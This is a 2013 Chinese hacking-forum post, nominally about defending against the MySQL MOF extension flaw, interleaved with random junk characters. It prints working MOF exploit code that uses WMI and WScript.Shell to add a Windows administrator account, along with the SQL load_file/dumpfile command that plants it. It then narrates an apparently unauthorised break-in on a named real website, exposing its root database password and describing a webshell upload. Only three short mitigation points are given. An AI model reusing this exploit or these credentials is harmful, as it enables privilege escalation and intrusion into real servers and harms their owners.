中国网络渗透测试联盟
标题:
Mysql mof扩展漏洞实例与防范
[打印本页]
作者:
admin
时间:
2013-1-4 19:49
标题:
Mysql mof扩展漏洞实例与防范
Mysql mof扩展漏洞防范方法
5 O8 i$ ]# Z! F1 K
+ t% O# c/ _8 H9 W
网上公开的一些利用代码:
; |% u) ~7 F# x) j. {2 \8 n5 {
' i6 }& p; u3 a9 N0 Z
#pragma namespace(“\\\\.\\root\\subscription”)
& }; n; l/ G2 A7 `2 X- B
4 A9 |/ e& d5 p; W# J( ^
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
? b9 N! M+ q
4 U" d; L7 x x' p4 O; P5 p) O' B
/ K; j0 m/ D- U/ g/ j0 s
/ A$ C Q% l. W9 @" G4 ~
; i+ y* \5 Z n7 Z; B/ m) u) n
' D2 s; H$ ?5 t8 z0 h$ G. G1 M* S
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
1 C" x0 p2 z. J# n% d
从上面代码来看得出解决办法:
# O, H! m2 I8 T
3 o4 E2 e2 e8 J% d; L
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数
& _; G+ T9 }9 U3 d3 _
9 e/ b5 C% t+ q" \) U3 b% H1 j
2、禁止使用”WScript.Shel”组件
Y. n* s% H+ W8 h, t4 K
2 [$ W- H7 c. @- L a3 J0 N. U+ }3 M
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
8 N" I5 M6 K, M
4 R) b, d: s, f5 p) e
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
4 j( J( U) }5 H% H
5 L, w. k% I) V8 H% X
事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
% `$ s N- C7 b5 w% s& r& x
0 G% [. n* ^5 B: o1 p" G# a! M0 M
但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
- j& `1 F( B8 b9 V
[: B: f3 H& g y- F, P, P
看懂了后就开始练手吧
$ N! r3 T' X% ~) ~" V& l
* x; e0 v% Q6 z0 d
http://www.webbmw.com/config/config_ucenter.php
一句话 a
& b6 B2 L( ^/ b0 g |9 O: P6 F3 _
% X& Y1 y+ k" [
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
/ j; I" R) ^3 l7 J x
! D) v/ I+ r2 K- U* F6 J0 F- i- c3 b2 F
于是直接用菜刀开搞
8 Q6 t8 e) g9 x' F8 ^
$ U Y- |7 J+ G+ B6 ?
上马先
" J& f' z2 f2 t* T' Z" n
6 g1 U5 X4 |4 c {/ u4 D
既然有了那些账号 之类的 于是我们就执行吧…….
2 O; G) c, g7 P8 G; `
) _! _' l& `& G& f+ t
小小的说下
; s* ?- O9 l# r- o# o; |
5 z7 P7 f ^" e6 B) [# |
在这里第1次执行未成功 原因未知
$ c: f4 ^, j0 W) S# K8 J0 \0 w
" q- Q0 V/ [4 k5 `1 x0 `* j- X9 S
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
1 }, a: d' x- o: O+ T
, @( G/ u& I/ h; D' W. o3 |3 Z
#pragma namespace(“\\\\.\\root\\subscription”)
; s5 O4 J- a$ n
. j! e3 ^- P' q+ z" J4 Q
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
) F# \) z$ X* Q9 J2 d6 I: a
! K* k1 Q: X R% Q- m
我是将文件放到C:\WINDOWS\temp\1.mof
7 S- h! W- ^/ A/ ?
/ X1 k( @% r% D+ K
所以我们就改下执行的代码
: H! o; ] B+ u S6 z1 G
# z b% T ]- I' [/ V
select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
( {/ V8 c2 p9 }! i) R$ x! A: b
* z, k8 @9 ?* c, t* B; N
3 `- P8 }7 E. B! D3 L
- c, x* \( b' v; b; d. A* U& F% v
但是 你会发现账号还是没有躺在那里。。
% y) S) p. `0 U0 s/ r/ \
" ?2 A5 O6 M+ w( i5 k! y2 l) L" n
于是我就感觉蛋疼
" e* D$ v6 O! j& W
" }& S$ n) k; r' f" ?
就去一个一个去执行 但是执行到第2个 mysql时就成功了………
# G$ R0 J' U. ~ {1 B q6 H
+ U/ U7 Y1 t0 }% i# F- Z0 [% }* J
. P" G- L$ A' d7 t2 Y# u# J/ ~
2 C! z3 m' p5 z
但是其他库均不成功…
2 v' \9 r/ [% o3 z/ m
: A$ f( x L2 l8 x8 P
我就很费解呀 到底为什么不成功求大牛解答…
; W( ?$ O0 `. p$ l! B* @
- `, E$ c5 n9 X' ]( P1 @1 C
9 D& d" h) W7 ~+ @+ t
9 u8 c" \ x; u7 K
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2